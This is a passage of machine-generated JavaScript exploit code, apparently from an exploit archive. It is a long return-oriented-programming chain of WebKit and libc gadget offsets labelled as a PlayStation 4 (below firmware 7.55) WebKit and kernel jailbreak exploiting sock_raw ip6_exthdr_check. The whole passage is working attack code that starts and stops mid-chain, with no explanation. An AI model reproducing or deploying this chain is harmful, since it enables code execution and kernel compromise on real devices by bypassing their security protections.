webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13133:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+591152, //L13134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13134:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+591224, //L13137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13137:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+591280, //L13138
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13138:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+591368, //L13140
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L13140:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L13142:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+591488, //L13145
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+591472, //L13143
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13143:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13145:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+591664, //L13148
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+591680, //L13149
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+591632, //L13146
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+591648, //L13147
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13146:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L13147:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13148:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13149:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+591760, //L13150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+591776, //L13151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L13150:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13151:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+591936, //L13155
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+591904, //L13153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+591920, //L13154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13152:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L13153:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13154:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13155:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+592040, //L13157
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+592024, //L13156
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13156:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13157:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+592136, //L13159
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L13158:
db([4294959104, 4294967295]); // -0x2000
set_gadget(libc_base+759608,); //pop rax
//L13159:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+592216, //L13161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13161:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+592272, //L13162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13162:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L13164:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L13165:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+592424, //L13167
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13167:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+592480, //L13168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13168:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+592552, //L13171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13171:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+592608, //L13172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13172:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+592696, //L13174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L13174:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13175:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13176:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+592888, //L13180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+592856, //L13178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+592872, //L13179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13177:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L13178:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13179:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13180:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+592992, //L13182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+592976, //L13181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13181:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13182:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+593088, //L13184
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L13183:
db([4294959104, 4294967295]); // -0x2000
set_gadget(libc_base+759608,); //pop rax
//L13184:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+593168, //L13186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13186:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+593224, //L13187
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13187:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L13189:
db([9, 0]); // 0x9
set_gadget(libc_base+763368,); //pop rcx
//L13190:
db([9, 0]); // 0x9
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+593376, //L13192
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13192:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+593432, //L13193
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13193:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+593504, //L13196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13196:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+593560, //L13197
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13197:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L13199:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L13201:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+593744, //L13204
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+593728, //L13202
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13202:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13204:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+593888, //L13207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+593856, //L13205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+593872, //L13206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13205:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13206:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13207:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+593968, //L13208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L13208:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L13210:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+594088, //L13213
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+594072, //L13211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L13211:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13213:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+594264, //L13216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+594280, //L13217
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+594232, //L13214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+594248, //L13215
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13214:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L13215:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13216:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13217:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+594360, //L13218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+594376, //L13219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L13218:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13219:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+594488, //L13222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+594456, //L13220
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L13220:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L13221:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13222:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+594624, //L13224
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+594640, //L13225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+594608, //L13223
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L13223:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13224:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13225:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+594752, //L13226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+594784, //L13228
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+594768, //L13227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L13226:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L13227:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L13228:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0
            
				

Sony playstation 4 (ps4) < 7.55 jailbreak webkit kernel loader sock_raw ip6_exthdr_check Vulnerability / Exploit Source : Sony playstation 4 (ps4) < 7.55 jailbreak webkit kernel loader sock_raw ip6_exthdr_check